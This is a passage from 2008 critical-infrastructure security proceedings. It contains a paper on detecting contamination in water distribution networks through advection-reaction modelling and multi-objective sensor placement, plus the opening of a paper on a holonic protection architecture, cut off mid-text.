References 1. Blind Spot, http://en.wikipedia.org/wiki/File:Blind_spot.JPG 2. Fonseca, F., Camara, G., Monteiro, A.: A Framework for Measuring the Interoperability of Geo-Ontologies. Spatial Cognition and Computation 6(4), 307–329 (2001) 3. Garrick, J.: Perspectives on the use of risk assessment to address terrorism. Risk Analysis 22(3), 421–423 (2002) 4. The Naitonal Strategy for Homeland Security. The office of Homeland Security (July 2002), http://www.whitehouse.gov/homeland/book/nat_strat_hls.pdf (accesed May 30, 2008) 5. Frank, A.U.: Tiers of Ontology and Consistency Constraints in Geographic Information Systems. International Journal of Geographical Information Science 15(7), 667–678 (2001)
An Ontology-Based Approach to Blind Spot Revelation
359
6. ICF Consulting. The Economic Cost of the Blackout: An issue paper on the Northeast Blackout (August 14, 2003), http://www.solarstorms.org/ICFBlackout2003.pdf (accessed May 31, 2008) 7. IWS. NERC Welcomes U.S.-Canada Power System Task Force Final Report. Published April 6, 2004 by the North American Electric Reliability Council (accessed May 30, 2008) 8. Kramer, J.: Is Abstraction the Key to Computing? Communications of the ACM 50(4), 37–42 (2007) 9. McNally, R.K., Lee, S.-W., Yavagal, D., Xiang, W.-N.: Learning the Critical Infrastructure Interdependencies Through an Ontology-Based Information System. Environment and Planning B: Planning and Design 34, 1103–1124 (2007) 10. Terner, M., Sutton, R., Hebert, B., Bailey, J., Gilbert, H., Jacqz, C.: Protecting Critical Infrastructure. GeoIntelligence (March 1, 2004), http://www.geointelmag.com/geointelligence/article/ articleDetail.jsp?id=90043 11. Tolone, W.J., Xiang, W.-N., Raja, A., Wilson, D., Tang, Q., McWilliams, K., McNally, R.: Mining critical infrastructure information from municipality data sets: a knowledge-driven approach and its applications. In: Hilton, B.N. (ed.) Emerging Spatial Information Systems and Applications, pp. 310–325. Idea Group Publishing, Hershey (2006) 12. Sandoz, J.F.: Red Teaming: A means to Military Transformation. Report by the Institute for Defense Analyses, Alexandria Va, Advanced Warfighting Program (2001), http://handle.dtic.mil/100.2/ADA388176 13. Tversky, A., Kahneman, D.: Judgment Under Uncertainty: Heuristics an Bias: Bias in Judgments Reveal Some Heuristics of Thinking Under Uncertainty. Science 185, 1124–1131 (1974) 14. Turban, E., Aronson, J.E.: Decision Support Systems and Intelligent Systems. Prentice Hall, Upper Saddle River (2001) 15. Weeks, A.: A Delphi-Case Design Method for Model Validation in Critical Infrastructure Protection Modeling and Simulation, Masters Thesis, Dept of Geography and Earth Sciences, Univ. of North Carolina at Charlotte (May 2006) 16. Wing, J.: Viewpoint: Computational Thinking. CACM 49(3), 33–35 (2006) 17. Xiang, W.-N., Clarke, K.C.: The use of scenarios in land-use planning. Environment and Planning B: Planning and Design 30(6), 885–909 (2003)
Security of Water Infrastructure Systems Demetrios G. Eliades and Marios M. Polycarpou KIOS Research Center for Intelligent Systems and Networks, Dept. of Electrical and Computer Engineering, University of Cyprus, Cyprus
Abstract. This paper formulates the security problem in critical water infrastructure systems for diagnosing quality faults. The proposed scheme is based on the discretized equations of advection and reaction of contaminant concentrations in pipes and tanks, expressed in a state-space form. Faults are signals affecting the states, and their impact is measured based on certain epidemiological dynamics. A multi-objective optimization problem is formulated for minimizing various risk-related objectives.
1 Introduction Water distribution networks are responsible for the transport of water of good quality to people and industries. They consist of underground pipe networks connected with facilities such as tanks and outflow pipes. The uninterrupted supply of clean, disinfected water is of extreme importance, and failure in delivering water of sufficient quantity or quality can seriously affect the consumers. The management and security of water distribution networks are similar to the management and security of other networked infrastructures, such as power and information systems. Pipe breaks or leakages are considered as hydraulic faults. Quality faults, on the other hand, can occur due to environmental contamination and insufficient or over-supplied chlorination. Moreover, within today’s asymmetric warfare, it is possible to “attack” the water supply system by adding enough quantities of a contaminant at some parts of the water distribution network, in order to affect the population’s health and the economy of a certain area. Terrorist attacks are assumed to be well informed and planned in order to cause maximum damage, either that being economic, psychological or physiological. In order to achieve this, neuralgic locations of the network may be “compromised” by the injection of sufficient quantities of some contaminant substance. Contaminants can enter anywhere in the network and they propagate along the water flow, throughout the network. It is practically impossible to observe all facilities and outflow nodes for detecting a contamination. In addition to that, contaminant injection can be achieved without actually violating an actual facility (e.g. a tank), for example, by using a pump to reverse the flow in a consumer supply pipe. The general security problem in water distribution systems can be outlined as follows: a) finding the critical locations in the network that are to be monitored by CCTV cameras or other means; b) finding the locations in the network in order to install quality sensors that will detect a contamination, early enough while minimizing the possible overall impact. For a successful security scheme, both problems need to be dealt with. If a contamination is detected early in the network, an alarm should inform water utility R. Setola and S. Geretshuber (Eds.): CRITIS 2008, LNCS 5508, pp. 360–367, 2009. c Springer-Verlag Berlin Heidelberg 2009
Security of Water Infrastructure Systems
361
to take the appropriate measures, such as closing the supply valves and issuing public notices. This paper formulates the security problem in critical water infrastructures for diagnosing quality faults. The proposed scheme is based on the discretized equations of advection and reaction of contaminant concentrations in pipes and tanks, expressed in a state-space form. Faults are signals affecting the states, and their impact is measured based on certain epidemiological dynamics. A multi-objective optimization problem is formulated for minimizing various risk-related objectives.
2 Background Water distribution networks are comprised of pipes which are connected to storage tanks, reservoirs or other pipes using junctions. Water travels from the storage facilities of the utility and is delivered to the consumers. Tanks connected to the network fill or empty according to a time schedule or are regulated through automated feedback controllers. Demand is the water outflow from the network which is driven by consumer requests. In water distribution networks, hydraulic and quality parameters are measured usually through SCADA systems. Hydraulic monitoring is quite common, measuring flow (volume per time) and pressure at various points of the network so that to observe consumption behaviour and detect leaks. Quality monitoring, on the other hand is not as advanced, and usually involves performing manual sampling or placing sensors at various locations to determine the chemical concentrations of various species such as chlorine (used for disinfection) or other contaminants. Quality faults may occur due to the contamination of water by certain substances, usually chemical, biological or radioactive, which travel along the flow, and they may exhibit decay or growth dynamics. Digestion or even inhalation of the contaminated water by consumers may affect the health of the served population; in addition, use of contaminated water in industrial production may cause severe economic losses. Associated with the flow of water, and the contaminants that may be contained in it, are inherent time-delays, which are characterized by the propagation dynamics. Timedelays are not constant, since they are influenced by stochastic variables such as consumer demand behaviour. The quality dynamics of the concentration of a representative species in a water pipe are described by the first-order hyperbolic equations of advection and the chemical reaction dynamics [1]. By neglecting axial dispersion, the mixed advection-reaction equation is described by
∂ c p (l,t) q p (t) ∂ c p (l,t) + = r p (c p (l,t)) ∂t Ap ∂l
(1)
where c p (l,t) is the species concentration at time t and distance l travelled along the pipe p. Function q p (t) corresponds to the time-varying water flow within pipe p, driven by the time-varying consumer demand flows of the entire network, and A p is the crosssectional area of the pipe. The boundary conditions for each pipe are given by c(l, 0) =
362
D.G. Eliades and M.M. Polycarpou
c0,t (l) and c(0,t) = c0,l (t) for positive sign flow. The right-hand side of (1), r p (·), describes the chemical reactions affecting species in pipe p; if there are no reactions, r p (·) = 0. Numerical methods can be employed to provide an approximation to the solution of (1) as described in [1]. The issue of modelling dangerous contaminant transport in water distribution networks was first examined in [2]. The authors discretized the equations of contaminant transport and simulated a network under contamination. Currently, in water research an open-source hydraulic and quality numerical solver called EPANET is frequently used for computing the advection and reaction dynamics in discrete-time using a Lagrangian numerical method [3]. Since there are not commonly defined criteria for expressing and quantifying security of water systems, most of the current research in water contaminant detection examines the sensor placement problem, using various formulations, assumptions and objectives . The security problem of contaminant detection in water distribution networks was first examined in [4]. An algorithmic “Battle of the Water Sensor Networks” boosted research on the problem and set some useful evaluation benchmarks [5]. Currently, the main approach is to formulate an integer program which is solved using either evolutionary algorithms [6] or mathematical programming [7]. Some groups have worked in an operational research framework in formulating the mathematical program, as in the “p-median” problem [8]. Some work has been conducted within a multi-objective framework, computing the Pareto fronts for conflicting objectives and computing the sets of non-dominant feasible solutions [9,10]. The concept of security in water distribution networks is still not formally established, therefore it is useful to address certain aspects of security as expressed in different research fields. In general, two types of faults may be considered: a) those that occur randomly, according to a probabilistic model; b) those that are in fact informed attacks seeking to cause maximal damage. As a result, researchers in general have either examined the sensor placement with respect to reliability (robustness) or vulnerability. In water distribution literature, the most frequently used metric is the average impact on the network. Recently, other risk-oriented metrics have also been applied [11,7], such as the “Conditional Value at Risk” (CVaR) which corresponds to the average impact of the worst case scenarios.
3 Mathematical Problem Formulation In the special case that the contaminant substance does not exhibit decay or growth dynamics, the linear advection equation in a pipe p is given by
∂ c p (l,t) q p (t) ∂ c p (l,t) + = 0, ∂t Ap ∂l
(2)
and corresponds to the movement of a species along the water flow in a pipe. To solve this numerically, the pipe p of length L p is divided into N p volume cells of length Δ l p = Lp N p . The length of time step k is Δ t, such that t = kΔ t. In the numerical approximations presented, we assume for simplicity that both flows and velocities are constant during each discrete time step. The constant flow at time-step k is Q p (k) = q p (kΔ t).
Security of Water Infrastructure Systems
363
We consider the Lax-Wendroff scheme [1, p.44], a Eulerian Finite-Difference method |Q (k)| [12] which is second-order accurate for smooth solutions and stable if Ap p ΔΔltp ≤ 1. For pipe p ∈ {1, ..., m} for m pipes in the network, the discretized equation of concentration of volume cell j, where j ∈ {1, ..., N p }, is given by Ck+1 p, j =
λ pk λ pk k k k 2 k k k 2 (1 + λ p )C p, j−1 + (1 − (λ p ) )C p, j − 2 (1 − λ p )C p, j+1 ,
(3)
Q (k)
where λ pk = Ap p ΔΔltp and Ckp, j is the concentration of contaminant in pipe p, volume cell j and at time-step k. In the case when the contaminant exhibits decay or growth dynamics, these are described by Differential-Algebraic Equations [13]. For simplicity, we consider first-order reaction dynamics, dtd c p (l,t) = K p c p (l,t), where K p is a reaction coefficient of pipe p; for K p > 0 the substance concentration grows and for K p < 0 it decays. Reaction coefficients may be different in each pipe and are usually estimated with field tests. In the discrete time and space, using the second-order Runge-Kutta method, the volume cell concentration is 1 2 2 k k Ck+1 p, j = (1 − K p Δ t + K p Δ t )C p, j = γ pC p, j , 2
(4)
where γ p = (1 − K pΔ t + 12 K p2 Δ t 2 ) for pipe p. By using the fractional step method [1], the discrete time advection-reaction equation for volume cell j in pipe p is given by λ pk λ pk k+1 k k k 2 k k k C p, j = γ p (1 + λ p )C p, j−1 + (1 − (λ p ) )C p, j − (1 − λ p )C p, j+1 . (5) 2 2 Junctions connecting pipes are considered as boundary points and are assumed to be virtual cells whose concentration depends on the inflow concentrations. Tanks are considered as discrete-volume cells with hydraulic dynamics, such that dtd vr (t)cr (t) = qTr,i (t)cr,i (t) − qTr,o (t)cr (t) + Kr cr (t), where vr (t) is the tank’s volume, cr (t) is the contaminants concentration in the tank, qr,i (t) is the vector of tank inflows along with the associated contaminant concentrations cr,i (t); qr,o (t) is the sum of the tank’s outflows and Kr the reaction coefficient. In discrete time this is expressed as Qkr,i Vrk − Qkr,o Δ t − Kr Δ t k+1 k Cr = Cr,i + Crk , (6) Vrk+1 Vrk+1 where Vrk is the tank’s volume at time k, Crk is the concentration in the tank, Qkr,i is the k ; Qk vector of tank inflows along with the associated contaminant concentrations, Cr,i r,o is the sum of the tank’s outflows. When only one contaminant is considered in the network, there are in total n¯ = ∑m i=1 Ni + mr volume cells in the water distribution network, where Ni is the number of discrete volume cells for pipe i, m is the number of pipes and mr is the number of tanks in the network. Based on the network topology and the interconnections, it is possible to express the quality dynamics in a state-space form, where each state is the contaminant
364
D.G. Eliades and M.M. Polycarpou
concentration in a finite volume, such as xi (k) = Ckp, j . State space representation will assist us in expressing faults and uncertainty in a straightforward manner. The set of equations describing the concentrations of each finite volume in the network, are formulated into a discrete-time dynamic system with n¯ states, such that x(k + 1) = A(k)x(k) + ϕ (k),
(7)
where k = {0, 1, ...} and x ∈ Rn¯ is the state vector, with zero initial conditions. The ¯ n¯ is computed through a nonlinear function A(k) = time-varying state matrix A ∈ Rn× fA (Q(k), H(k),Uc (k)), where Q(k) is the vector of pipe flows, H(k) is the vector of tank water heights and Uc (k) is the hydraulic controls vector. We assume that matrix A(k) represents the nominal healthy dynamics. The term ϕ ∈ Φ , Φ ⊂ Rn¯ , corresponds to the changes in the system’s dynamics due to a fault. We further assume that there is a finite set F comprised of N fault functions whichconstitute a representative sample of the possible fault functions for the system F = ϕ 1 (k), ..., ϕ N (k) . For the i-th fault function, ϕ i (k) ∈ F is a vector of fault T signals, ϕ i (k) = gi1 (k, θ1i ), ..., gin¯ (k, θn¯i ) , where i = {1, ..., N}; the known functions gij (k, θ ji ) describe the structure of fault i affecting state j and the unknown parameters θ ji ∈ Θ its characteristics, where Θ ⊂ Rν , ν = |θ ji |. The impact due to a contamination fault could be directly expressed in two ways: (a) in epidemiological terms, e.g. number of people infected; (b) economically, e.g. cost of fault accommodation. Other indirect measures of the fault’s impact can be also considered, such as the consumed volume of contaminated water that exceeds a certain concentration threshold [5]. Various nonlinear epidemiological models suitable for water contamination and human health has been proposed in previous research [5,14,15,16]. ¯ We define y¯ ∈ Rn as the vector of “nodal” states, computed from y(k) ¯ = Cx(k), where n× n ¯ ¯ C∈R has all its elements zero except one element in each row with value “1”; the row vectors are linear independent and n ≤ n. ¯ We further define nodes V = {v1 , ..., vn } as the locations where water can be consumed, corresponding to the n finite-volume cells that are measured in “nodal” vector y(k). ¯ Let d ∈ Rn such that di (k) is the normalized water outflow of node vi at time k; similarly, y¯i (k) is the concentration of contaminant at node vi at time k. A generic state-space representation of the fault impact is
ξ (k + 1) = ξ (k) + fΞ (y(k), ¯ d(k)) ω¯ (k) = fΩ (ξ (k)),
(8) (9)
where ξ ∈ Rn is the nodal, and ω¯ ∈ R the total impact metric. These are computed with the nonlinear functions fΞ : Rn × Rn → Rn and fΩ : Rn → R. For example, fΞ (·) can correspond to the consumed contaminated water where fΞ (y¯i (k), di (k)) = di (k)Δ t, if y¯i (k) is greater than a threshold; otherwise it is zero. The total consumption is the sum of the impact states, computed using fΩ (ξ (k)) = 1T ξ (k).
4 Methodology for Sensor Placement We apply discrete grid sampling in the region enclosed by Θ in order to create vector θ¯i ∈ Θ , for i = {1, ..., l }, where l is the number of samples. We define a contamination
Security of Water Infrastructure Systems
365
scenario sij ∈ S as the fault function ϕ j (k) with parameter θ¯i , i.e. sij = ϕ j (k)|θ¯i . For each fault function there are l different parameters, therefore the set of all the fault functions with different parameters is S = s11 , ..., s1l , ..., sN1 , ..., sNl , where N is the number of fault functions and l the number of grid samples. For example, a hypothetical scenario is s11 = [g(k, θ¯1 ), 0, ..., 0]T , where g(·) is a known function. We can now compute the global impact of a contamination scenario until it is first detected at a node (due to a sensor installed). Let ω (vi , s j ) be the impact (e.g. number of people affected) until a fault corresponding to scenario s j ∈ S is detected by node vi . Therefore, ω (vi , s j ) = {ω¯ (kd ) : kd = min{k : y¯i (k) > ε , ε ∈ R+ }}, where ω : V × S → R; ε represents the minimum amount of contaminant concentration that needs to be present before a sensor will be able to make a detection decision; kd the earliest timestep at which the detection occurs. In relation to the sensor placement problem, when there is more than one sensor in the network, the impact of a fault scenario s ∈ S is the minimum impact among all the impacts computed for each node/sensor; essentially it corresponds to the sensor that detects the fault first. Let X be a set of nodes, such that X ⊂ V . We define three objective functions fi : X → R, i = {1, 2, 3}, that map a set of nodes X to a real number. Function f1 (X ) is the average impact of the set of all scenarios, f2 (X ) is the maximum impact of the set of all scenarios; function f3 (X ) corresponds to the CVaR risk metric and is the average impact of the scenarios in the set S ∗ ⊂ S with impact larger that α f2 (X ), where α ∈ [0, 1]: f1 (X ) =
1 ω (χ , s) ∑ min χ ∈X |S | s∈S
f2 (X ) = max min ω (χ , s) s∈S χ ∈X
f3 (X ) =
1 ω (χ , s), ∑ ∗ min χ ∈X |S ∗ | s∈S
(10) (11) (12)
where S∗ = si ∈ S , i = {1, ..., Nl } : minχ ∈X ω (χ , s) ≥ α f2 (X ) . The multi-objective optimization problem is formulated as: min { f1 (X ), f2 (X ), f3 (X )} , X
(13)
subject to X ⊂ V and |X| = Ns , where V ⊆ V is the set of feasible nodes and Ns the number of sensors to be placed. This problem can be solved using multi-objective evolutionary optimization or any other Pareto-front optimization method. Due to space limitations, no simulation studies are presented to illustrate the proposed methodology for sensor placement.
5 Conclusions In this work we have presented the security and fault detection problem of critical water infrastructure. Based on the first-order hyperbolic equations of advection and reaction
366
D.G. Eliades and M.M. Polycarpou
within pipes we have presented a mathematical formulation suitable for fault diagnosis. A multi-objective optimization problem was proposed for determining sensor locations, in order to detect faults using sensors measuring contaminant concentrations. Three risk-oriented objective functions are considered in the optimization problem, for reducing the fault’s impact. Further research will investigate the problems of hydraulic and quality fault detection, fault isolation in order to determine the intrusion location and fault identification in order to estimate the magnitude and type of the contamination. Acknowledgments. This work is partially supported by the Cyprus Research Promotion Foundation and the University of Cyprus.
References 1. LeVeque, R.: Nonlinear Conservation Laws and Finite Volume Methods. In: Computational Methods for Astrophysical Fluid Flow, pp. 1–159. Springer, Berlin (1998) 2. Kurotani, K., Kubota, M., Akiyama, H., Morimoto, M.: Simulator for contamination diffusion in a water distribution network. In: Proc. IEEE IECON 21st International Conference on Industrial Electronics, Control, and Instrumentation, November 6-10, vol. 2, pp. 792–797 (1995) 3. Rossman, L.A.: The EPANET programmer’s toolkit for analysis of water distribution systems. In: Proc. of ASCE 29th Annual Water Resources Planning and Management Conference, pp. 39–48 (1999) 4. Kessler, A., Ostfeld, A., Sinai, G.: Detecting accidental contaminations in municipal water networks. ASCE Journal of Water Resources Planning and Management 124(4), 192–198 (1998) 5. Ostfeld, A., Uber, J.G., Salomons, E., Berry, J.W., Hart, W.E., Phillips, C.A., Watson, J.P., Dorini, G., Jonkergouw, P., Kapelan, Z., di Pierro, F., Khu, S.T., Savic, D., Eliades, D., Polycarpou, M., Ghimire, S.R., Barkdoll, B.D., Gueli, R., Huang, J.J., McBean, E.A., James, W., Krause, A., Leskovec, J., Isovitsch, S., Xu, J., Guestrin, C., Van Briesen, J., Small, M., Fischbeck, P., Preis, A., Propato, M., Piller, O., Trachtman, G.B., Wu, Z.Y., Walski, T.: The battle of the water sensor networks (BWSN): A design challenge for engineers and algorithms. ASCE Journal of Water Resources Planning and Management (2008) (to appear) 6. Huang, J.J., McBean, E.A., James, W.: Multi-objective optimization for monitoring sensor placement in water distribution systems. In: Proc. of ASCE 8th Annual Water Distibution System Analysis Symposium (2006) 7. Hart, W., Berry, J., Riesen, L., Murray, R., Phillips, C., Watson, J.: SPOT: A sensor placement optimization toolkit for drinking water contaminant warning system design. In: Proc. World Water and Environmental Resources Conference (2007) 8. Berry, J.W., Fleischer, L., Hart, W.E., Phillips, C.A., Watson, J.P.: Sensor placement in municipal water networks. ASCE Journal of Water Resources Planning and Management 131(3), 237–243 (2005) 9. Eliades, D., Polycarpou, M.: Iterative deepening of Pareto solutions in water sensor networks. In: Proc. of ASCE 8th Annual Water Distibution System Analysis Symposium, ASCE (2006) 10. Eliades, D.G., Polycarpou, M.M.: Multi-objective optimization of water quality sensor placement in drinking water distribution networks. In: Proc. of European Control Conference, pp. 1626–1633 (2007)
Security of Water Infrastructure Systems
367
11. Watson, J.P., Hart, W.E., Murray, R.: Formulation and optimization of robust sensor placement problems for contaminant warning systems. In: Proc. of ASCE 8th Annual Water Distibution System Analysis Symposium, ASCE (2006) 12. Rossman, L.A., Boulos, P.F.: Numerical methods for modeling water quality in distribution systems: A comparison. ASCE Journal of Water Resources Planning and Management 122(2), 137–146 (1996) 13. Shang, F., Uber, J.G., Rossman, L.A.: EPANET Multi-Species Extension User’s Manual. National Risk Management Research Laboratory, Office of Research and Development, U.S. Enviromental Protection Agency, Cincinnati, OH 45268 (August 2007) 14. Murray, R., Uber, J., Janke, R.: Model for estimating acute health impacts from consumption of contaminated drinking water. Journal of Water Resources Planning and Management 132(4), 293–299 (2006) 15. Chick, S., Koopman, J., Soorapanth, S., Brown, M.: Infection transmission system models for microbial risk assessment. The Science of the Total Environment 274(1-3), 197–207 (2001) 16. Chick, S., Soorapanth, S., Koopman, J.: Inferring infection transmission parameters that influence water treatment decisions. Management Science 49(7), 920–935 (2003)
Critical Infrastructures as Complex Systems: A Multi-level Protection Architecture Pierluigi Assogna4, Glauco Bertocchi3 , Antonio DiCarlo2,5 , Franco Milicchio1 , Alberto Paoluzzi1,5, Giorgio Scorzelli1,5 , Michele Vicentino5 , and Roberto Zollo4,5 1 3
Department of Informatics and Automation, University “Roma Tre”, Italy 2 Department of Studies on Structures, University “Roma Tre”, Italy Master on Security and Protection, University of Rome “La Sapienza”, Italy 4 Theorematica spa, Rome, Italy 5 TRS (Technology & Research for Security) srl, Rome, Italy
Abstract. This paper describes a security platform as a complex system of holonic communities, that are hierarchically organized, but selfreconfigurable when some of them are detached or cannot otherwise operate. Furthermore, every possible subset of holons may work autonomously, while maintaining self-conscience of its own mission, action lines and goals. Each holonic unit, either elementary or composite, retains some capabilities for sensing (perception), transmissive apparatus (communication), computational processes (elaboration), authentication/authorization (information security), support for data exchange (visualization & interaction), actuators (mission), ambient representation (geometric reasoning), knowledge representation (logic reasoning), situation representation and forecasting (simulation), intelligent feedback (command & control). The higher the organizational level of the holonic unit, the more complex and sophisticated each of its characteristic features.
1
Introduction
Complexity is ill-defined, as expounded by [1] in the inaugural paper of the homonymous journal. For our present purposes, the non mathematical definition provided by the Complex System Society on its web page [2] is good enough, where critical infrastructures are mentioned as exemplary. If controlling a complex system is the issue at stake, then the stress should be laid on integration: monitoring and simulating separately the behavior of its parts is pointless, unless the same (or better) care is taken of their interactions. Recognizing global behavioral patterns, through (space and time) correlation among local events, is more important than detecting minute details. However, in a highly nonlinear system, some local minutia may have a strong global impact, and nobody can
Development funded by a research grant from the Italian Ministry of University and Research (MUR) to TRS, which stands for “Technology and Research for Security”, a spinoff company from University Roma Tre and Theorematica.
R. Setola and S. Geretshuber (Eds.): CRITIS 2008, LNCS 5508, pp. 368–375, 2009. c Springer-Verlag Berlin Heidelberg 2009
Critical Infrastructures as Complex Systems
369
foretell with certainty which ones: hence the need for contextual knowledge and educated guesses. In order to provide a higher-level of awareness for security and safety of complex critical infrastructures, we need a system architecture that is able to integrate the human insight with the capacity of combining a myriad of events dispersed in time and space. Accordingly, we introduce here an advanced architecture for protection of complex critical infrastructures. It includes: (a) a geometric reasoning engine, providing a multi-scale digital model of the infrastructure to be protected and supporting video surveillance and sensor fusion; (b) a distributed data mining environment, dedicated to event discovery and tracking; and (c) an advanced control center, supporting situation evaluation through dynamical modeling and simulation. In our opinion these components are the best candidates to: (i) serve as a point of reference for the integration of vision, sensor, tracking and security systems committed to infrastructure protection; (ii) provide a reliable basis for high-level situation awareness; (iii) enable coordinated and optimized decision making. Complex critical infrastructures, in particular those crossing national borders (such as tunnels, bridges, etc.) or affecting the everyday life of thousands of people (such as railways hubs, airports, power plants, etc.), require a novel security approach and architecture. Their security, i.e., the capacity of preventing threats and reacting to menaces, should be based on a strong control and awareness of daily operations, since a security threat can arise not only from malicious attacks but also from natural events (storms, floods, etc.) or unexpected facts, like traffic congestion or collisions. An advanced security architecture should also provide means to infer the consequences of events from available information, possibly augmented via interpolation of missing elements. This is, in our view, the actual value of including virtual/augmented reality and advanced interfaces in our proposed architecture. Moreover, the knowledge base should be used for events analysis and decision-making. Modeling and simulation are complementary components for decision support. Conversely, present-day security systems are generally assemblies of sensor subsystems, with very limited capabilities of assisting the personnel during normal operations and crises. In this paper we discuss the development goals and the implementation directions of a new platform for security of critical infrastructures based on the above described architecture. This platform is based on: (1) capability of providing (natural or artificial) sight instruments; (2) events analysis and correlation for decision support.
2
Protection Functions
We imagine a holonic, multi-level organisation of custodians, which will maintain and use an awareness base represented by the integration of models, environment sensing, and surveillance and control activities. In this section we discuss the range of functions supported by the surveillance and protection units, either in isolation or combined together. Each of the characteristics discussed below
370
P. Assogna et al.
becomes more complex and sophisticated when the organizational level of each holonic unit grows. Perception. Several passive and active sensor systems may be integrated, including video surveillance [9], access control (transponder, smartcard, RFID, etc.), intrusion detection (sound, infrared, etc.), sensing of environmental components (fumes, fire, humidity, temperature, concentration of pollutants, etc.). Direct sensor fusion provides better information by combining data provided by homogeneous or heterogeneous sensors [10]. Indirect sensor fusion enforces the process by using a priori knowledge about the scene and its environment. A statistically clustered history is assumed to be available. Furthermore, a hypothesis of known scene is also assumed to hold, where a solid model of the surrounding environment is always available, at the appropriate level of detail. The central feature of our security platform is the design of software holons acting as a Community of Custodians. This community will embody the intelligence of the infrastructure, i.e., all the activities of sensing, operating devices, alerting security personnel, and so on. In particular, it makes up a holonic multi-scale organization, which maintains and uses an awareness base integrating both behavioral models and environmental sensing data and supports surveillance and control activities. Computation. A holonic architecture has to support distributed, fault-tolerant, real-time, non-stop applications. It should even supports hot swapping of programs, so that the code of some agents can be changed without stopping the system. The actor model has been used both as a framework for a theoretical understanding of concurrency, and as a basis for several practical implementations of concurrent systems. An actor can (a) make local decisions, (b) create other actors, (c) send and receive messages, and (d) determine how to respond to received messages. The actor model provides the easiest approach to agent-based computing, a computational model for simulating the actions and interactions of autonomous entities and individuals, which affect the system as a whole. In our holonic architecture the agents (often called holons here) could either be software agents, humans, human teams or combined human-agent teams. Monte Carlo Methods are used to introduce randomness. Visualization. According to the holonic architecture of the security platform and its strong 3D orientation, each holon will be provided with appropriate information visualization tools, ranging from graphical displays on mobile handsets held by security agents, to single workstations and service hubs dislocated in key points of the security network, up to wall-panel displays in the control room(s). Visualization tools of virtual and augmented scenes will be mainly used for training the security personnel, and for displaying in a realistic way the results of simulations needed to support the decision makers during a crisis. The visualization tools may display highly realistic views of the rendered scene using a combination of advanced graphics techniques. For each location they will provide both visual and verbal directions on how to approach the selected destination. The main problem in the realistic visualization of virtual environments is the low quality of the (local) lighting models employed, since the Gouraud/Phong
Critical Infrastructures as Complex Systems
371
model used by graphics hardware is too simplistic, the number of light sources is usually too low, and there is no interaction between reflecting surfaces, that should conversely integrate perfectly into real scenes, that is to say without visual discontinuity and with adaptive tone mapping. Interaction. The protection platform has a holonic architecture where each holon is autonomous within its defined limits, takes care of a defined portion of the infrastructure, and must be able to alert and communicate, in all circumstances, with the stakeholders of the controlled scene. All stakeholders involved in security and safety can communicate with any level of the monitoring platform, being aware that the controlled scene (and the impact of their decisions) grows generally bigger as the interface level gets higher. Accredited people will be able to access any detail of the awareness base, as required by the dinamics of the situation. The protection platform will provide: 1. the capability of planning all the activities of the security personnel, for both normal situations and emergencies; 2. the capability of planning the frequentation patterns [11] of people for normal situations, and the escape procedures in case of emergencies; 3. full awareness of the aspects of the situation that can impact security and safety of the infrastructure, of the people involved and of its surroundings; 4. means of communicating as efficiently as possible (given the situation) with the personnel and the public involved. Information security. Enforcing information security is a fundamental property for a holonic system whose purpose is to protect critical infrastructures. Every security failure in a single component may result in a security breach or crack of the security system and, as a consequence, of the critical infrastructure. Consequently, each holon must be protected with state-of-the-art security technology, in particular with mutual authentication of agents, machines, processes and services. Several ICT infrastructures, and most private companies, attempt to use firewalls to solve network security problems. Unfortunately, firewalls assume that “the bad guys” are on the outside, which is often a bad assumption. Most of computer crimes are carried out by insiders. Firewalls also have a significant disadvantage in that they restrict the use of the Internet. The restrictions of network functionality imposed by firewalls are often both unrealistic and unacceptable. Therefore, we assume network connections to be insecure. Geometric reasoning. Spatial models play a key role when interpreting a dynamic and uncertain world for a surveillance application. In particular, [12], in “Spatial Models for Wide-Area Visual Surveillance: Computational Approaches and Spatial Building-Blocks”, chooses the cellular decompositive representation of the space as the most promising spatial primitive to support visual surveillance applications. This paper discusses also the necessity to associate a semantics to the hierarchical elements of the spatial subdivision. To satisfy these requirements, we use the geometric language PLaSM for generating and handling contained geometric information contained in our holonic security architecture. PLaSM (Programming LAnguage for Solid Modeling) is strongly
372
P. Assogna et al.
influenced by FL (programming at Function Level), the approach to functional programming [14,15] developed by the Functional Programming Group leaded by John Backus and John Williams at the IBM Research Division in Almaden in the early nineties. PLaSM provides the full power of a Turing-complete programming language, with support for conditional, recursion, higher-level functional abstraction, etc. Moreover, it is multidimensional by design, a property that enhances its expressive power and allows very terse definitions of highly complex models. Bayesian Reasoning. The assessment of static and dynamic knowledge requires an extensive use of the self-consciousness provided by geometric models of the infrastructure and by dynamic patterns of usage [11] derived from sensor systems. Each holon must learn which configurations of its controlled scene are good, acceptable or to be avoided in order to enforce safety and security for scene’s stakeholders and users. This knowledge, again represented by models, involves security protocols, use of new technologies, procedures, etc., and has to evolve in relation to the changes of the social and physical environment. In particular, we imagine a multi-level holonic organization of both software and human custodians, which maintains and uses an awareness base that integrates models, environment sensing, surveillance and control activities. By awareness we mean the capability of having, in all situations, a clear view of what is happening, a history of past events, forecasts of future events, simulations of possible scenarios. Such knowledge in perspective of the present situation, its precursors and its possible outcomes, maximises the possibility of control. Simulation. Living organisms learn through a trial-and-error process, which leads to optimized internal representations and simulations of the environment, which are in turn a consequence of the environmental configurations. Some models are inherited, some are developed during lifetime. This learning process never ends, as the environment evolves and changes. The unconscious, and successful, assumption of this survival mechanism is that even if events are all different from each other, there are similarities and categorizations that allow an organism to infer the evolution of events, while they are happening, on the base of experience. A concept central to the security platform is therefore to enhance as much as possible its modeling capabilities, since all the supports provided are based on model-based simulations. In order to simulate the behavior of an environment, the basic activity is modeling all the objects, actions, actors, that in any way influence the behavior of the environment itself. Through the capability of simulating all kinds of events and all actions and reactions that may animate the environment, the platform will be capable of maintaining the controlled infrastructure, as much as possible, in an optimally secured state for its users and for the management personnel. The platform will also provide all possible support to security enforcing personnel, in case of situations that exceed its capability of automatic management. Operation command and control. In this holonic, multi-level control structure, the custodian agents will be structured in teams, and in teams of teams: in this way the organization will be scalable to any size. Each team or single custodian
Critical Infrastructures as Complex Systems
373
